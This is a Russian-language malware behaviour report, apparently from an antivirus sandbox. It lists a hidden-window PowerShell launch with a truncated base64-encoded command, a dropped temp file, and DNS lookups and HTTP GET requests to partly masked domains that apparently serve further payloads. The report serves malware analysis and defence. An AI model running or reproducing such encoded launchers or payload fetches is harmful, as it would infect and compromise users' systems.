Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1580
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1369751.cvr
Сетевая активность
Подключается к
- 'xe#a.cz':80
- 'si##q.com':80
- 'wi##e.be':80
- 'wi##e.be':443
- 'au######crefreshments.com':80
TCP
Запросы HTTP GET
- http://xe#a.cz/MqjiWrT/
- http://wi##e.be/awstats/lseZLdJ/
- http://au######crefreshments.com/wp-includes/bVhbrGmu/
Другие
- 'wi##e.be':443
UDP
- DNS ASK xe#a.cz
- DNS ASK ze###oser.com
- DNS ASK si##q.com
- DNS ASK wi##e.be
- DNS ASK au######crefreshments.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AGEAaQB0AGsAdQB0AGgAZQBlAGYAPQAnAGgAdQBhAGwAdABhAHMAdABoAGkAYQBsACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBpAGAAVAB5AGAAcABgAFIAbwB0AG...' (со скрытым окном)
